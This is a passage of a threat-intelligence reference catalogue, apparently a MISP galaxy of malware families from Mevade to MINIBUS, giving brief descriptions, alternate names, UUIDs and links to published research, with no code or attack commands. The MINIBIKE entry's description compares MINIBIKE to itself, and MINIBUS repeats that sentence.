- https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/ - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-winter - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/ - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md - webarchive
- https://www.countercraftsec.com/blog/post/shellcode-detection-using-realtime-kernel-monitoring/ - webarchive
- https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/ - webarchive
- https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mevade
A botnet that used Tor .onion links for C&C.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mevade.
Known Synonyms |
---|
SBC |
Sefnit |
Internal MISP references
UUID 3454bd71-29e1-498b-82d8-111aeadedee5
which can be used as unique global reference for Mevade
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mevade - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sefnit-trojan-just/ - webarchive
- https://www.youtube.com/watch?v=FttiysUZmDw - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf - webarchive
- https://blog.fox-it.com/2013/09/05/large-botnet-cause-of-recent-tor-network-overload/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mewsei
Internal MISP references
UUID 48cb12ee-c60a-46cd-b376-39226027c616
which can be used as unique global reference for Mewsei
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MgBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MgBot.
Known Synonyms |
---|
BLame |
MgmBot |
POCOSTICK |
Internal MISP references
UUID d97c2c0c-ef3a-4512-846a-f4cdeee7787a
which can be used as unique global reference for MgBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot - webarchive
- https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/ - webarchive
- https://www.welivesecurity.com/en/eset-research/cloudscout-evasive-panda-scouting-cloud-services/ - webarchive
- https://twitter.com/GossiTheDog/status/1438500100238577670 - webarchive
- https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/ - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware - webarchive
- https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot - webarchive
- https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Miancha
Internal MISP references
UUID a3370013-6c47-422e-a4d4-1b86ee71e5e5
which can be used as unique global reference for Miancha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Micrass
Internal MISP references
UUID 6c09cc53-7160-47c6-8df8-3e0d42deb5a6
which can be used as unique global reference for Micrass
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MicroBackdoor
Open-source lightweight backdoor for C2 communication. GitHub: https://github.com/Cr4sh/MicroBackdoor
Internal MISP references
UUID 07c7b7dc-cec8-4542-b351-ce7d757812d7
which can be used as unique global reference for MicroBackdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor - webarchive
- https://www.mandiant.com/resources/spear-phish-ukrainian-entities - webarchive
- https://cert.gov.ua/article/37626 - webarchive
- https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/ - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://github.com/cr4sh/microbackdoor - webarchive
- https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/ - webarchive
- https://attackiq.com/2022/04/29/attack-graph-response-to-unc1151-continued-targeting-of-ukraine/ - webarchive
- https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Microcin
Internal MISP references
UUID 185d8b28-0179-4ec6-a3c8-201b1936b9aa
which can be used as unique global reference for Microcin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin - webarchive
- https://github.com/dlegezo/common - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf - webarchive
- https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/ - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia - webarchive
- https://securelist.com/microcin-is-here/97353 - webarchive
- https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/ - webarchive
- https://securelist.com/microcin-is-here/97353/ - webarchive
- https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636 - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/ - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Micropsia
This malware, written in Delphi, is an information-stealing malware family dubbed "MICROPSIA". It has a wide range of data theft functionality built in.
Internal MISP references
UUID b37f312f-a0b1-41a9-88ae-da2844c19cae
which can be used as unique global reference for Micropsia
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia - webarchive
- http://blog.talosintelligence.com/2017/06/palestine-delphi.html - webarchive
- https://www.sentinelone.com/labs/gaza-cybergang-unified-front-targeting-hamas-opposition/ - webarchive
- https://research.checkpoint.com/apt-attack-middle-east-big-bang/ - webarchive
- http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks - webarchive
- https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf - webarchive
- https://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html - webarchive
- https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Midas
This malware, written in C#, is a variant of the Thanos ransomware family. It emerged in October 2021 and is obfuscated using SmartAssembly. In 2022, ThreatLabz (Zscaler) analysed an incident in which Midas ransomware was slowly deployed over a two-month period. This ransomware also features its own data leak site as part of its double extortion strategy.
Internal MISP references
UUID e5043a7f-2c38-4015-978e-253a7cdbda97
which can be used as unique global reference for Midas
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.midas - webarchive
- https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/ - webarchive
- https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants - webarchive
- https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mikoponi
Internal MISP references
UUID 87abb59d-0012-4d45-9e75-136372b25bf8
which can be used as unique global reference for Mikoponi
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Milan
Internal MISP references
UUID 5b1fe92d-9a78-4543-8efb-7c674492d0d2
which can be used as unique global reference for Milan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MILKMAID
Internal MISP references
UUID 801d8a6a-b7ba-4557-af5d-1005e53145e2
which can be used as unique global reference for MILKMAID
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Milum
In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.
Internal MISP references
UUID d1942959-9c6f-462b-87bf-da6ed914669d
which can be used as unique global reference for Milum
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.milum - webarchive
- https://securelist.com/wildpressure-targets-macos/103072/ - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
mim221
Internal MISP references
UUID 83ebded5-6ce5-471a-9bfe-db7cca6b3756
which can be used as unique global reference for mim221
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mimic Ransomware
According to PCrisk, Mimic is a ransomware-type program. Malware within this classification is designed to encrypt data and demand ransoms for decryption. Evidence suggests that Mimic is based on the leaked CONTI ransomware builder. Mimic campaigns have been observed targeting English- and Russian-speaking users.
Internal MISP references
UUID 40e57c70-c83b-4820-87fd-f684f4960268
which can be used as unique global reference for Mimic Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic - webarchive
- https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html - webarchive
- https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MimiKatz
Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.
Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
Internal MISP references
UUID 588fb91d-59c6-4667-b299-94676d48b17b
which can be used as unique global reference for MimiKatz
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz - webarchive
- https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/ - webarchive
- https://www.welivesecurity.com/2022/09/06/worok-big-picture/ - webarchive
- https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns - webarchive
- https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/ - webarchive
- http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf - webarchive
- https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf - webarchive
- https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-vinewood - webarchive
- https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/ - webarchive
- https://attack.mitre.org/groups/G0011 - webarchive
- https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html - webarchive
- https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html - webarchive
- https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/ - webarchive
- https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger - webarchive
- https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-hickman - webarchive
- https://awakesecurity.com/blog/catching-the-white-stork-in-flight/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east - webarchive
- https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://twitter.com/inversecos/status/1456486725664993287 - webarchive
- https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/ - webarchive
- https://www.intrinsec.com/apt27-analysis/ - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-275a - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-burlap - webarchive
- https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware - webarchive
- https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html - webarchive
- https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf - webarchive
- https://www.secureworks.com/research/samsam-ransomware-campaigns - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://unit42.paloaltonetworks.com/operation-diplomatic-specter/ - webarchive
- https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html - webarchive
- https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - webarchive
- https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers - webarchive
- https://www.mandiant.com/resources/blog/alphv-ransomware-backup - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf - webarchive
- https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021 - webarchive
- https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - webarchive
- https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia - webarchive
- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks - webarchive
- https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection - webarchive
- https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/ - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
- https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf - webarchive
- https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html - webarchive
- https://www.infinitumit.com.tr/apt-35/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://blog.xpnsec.com/exploring-mimikatz-part-1/ - webarchive
- https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/ - webarchive
- https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos - webarchive
- https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html - webarchive
- https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/ - webarchive
- https://www.secureworks.com/research/threat-profiles/tin-woodlawn - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf - webarchive
- https://noticeofpleadings.com/nickel/# - webarchive
- https://unit42.paloaltonetworks.com/atoms/obscureserpens/ - webarchive
- https://www.ic3.gov/Media/News/2021/210527.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/ - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/ - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf - webarchive
- https://www.secureworks.com/blog/ransomware-deployed-by-adversary - webarchive
- https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf - webarchive
- https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730 - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ - webarchive
- https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/ - webarchive
- https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran - webarchive
- https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/ - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-franklin - webarchive
- https://www.accenture.com/us-en/blogs/security/ransomware-hades - webarchive
- https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups - webarchive
- https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis - webarchive
- https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/ - webarchive
- https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/ - webarchive
- https://twitter.com/swisscom_csirt/status/1354052879158571008 - webarchive
- https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153 - webarchive
- https://unit42.paloaltonetworks.com/trigona-ransomware-update/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two - webarchive
- https://www.ic3.gov/media/news/2020/200917-1.pdf - webarchive
- https://asec.ahnlab.com/en/56236/ - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf - webarchive
- https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf - webarchive
- https://www.hvs-consulting.de/lazarus-report/ - webarchive
- https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ - webarchive
- https://asec.ahnlab.com/ko/56256/ - webarchive
- https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/ - webarchive
- https://www.varonis.com/blog/hive-ransomware-analysis - webarchive
- https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://github.com/gentilkiwi/mimikatz - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage - webarchive
- https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-152a - webarchive
- https://www.slideshare.net/yurikamuraki5/active-directory-240348605 - webarchive
- https://securelist.com/the-sessionmanager-iis-backdoor/106868/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://asec.ahnlab.com/ko/39682/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks - webarchive
- https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - webarchive
- https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/ - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-drake - webarchive
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/ - webarchive
- https://www.ic3.gov/Media/News/2021/210823.pdf - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Mindware
Ransomware, potential rebranding of win.sfile.
Internal MISP references
UUID cfd0ab21-12e6-4c95-acc7-a8f488ed1706
which can be used as unique global reference for Mindware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MINEBRIDGE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MINEBRIDGE.
Known Synonyms |
---|
GazGolder |
Internal MISP references
UUID 663d4310-51ea-4ac1-9426-b9e9c5210471
which can be used as unique global reference for MINEBRIDGE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge - webarchive
- https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/ - webarchive
- https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/ - webarchive
- https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat - webarchive
- https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures - webarchive
- https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism - webarchive
- https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MiniASP
Internal MISP references
UUID a4f8bacf-2076-4e00-863c-874cdd833a41
which can be used as unique global reference for MiniASP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MINIBIKE
According to Mandiant, this is a custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE.
Internal MISP references
UUID 6ac94abf-1fc0-459d-8ffd-81cdd12b7a31
which can be used as unique global reference for MINIBIKE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
miniBlindingCan
miniBlindingCan is an HTTP(S) orchestrator.
It is a variant of the BlindingCan RAT, having the same command parsing logic, but supporting only a small subset of commands available previously. The main operations are the update of the malware configuration, and the download and execution of additional payloads from the attackers' C&C.
The miniBlindingCan malware was used in Operation DreamJob attacks against aerospace and media companies in Q2-Q3 2022.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular miniBlindingCan.
Known Synonyms |
---|
AIRDRY.V2 |
EventHorizon |
Internal MISP references
UUID d266693e-0564-47e7-93ac-128d491efcab
which can be used as unique global reference for miniBlindingCan
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ - webarchive
- https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ - webarchive
- https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MINIBUS
According to Mandiant, this is a custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE.
Internal MISP references
UUID eac92334-6af5-4d19-80b6-80abe5580afb
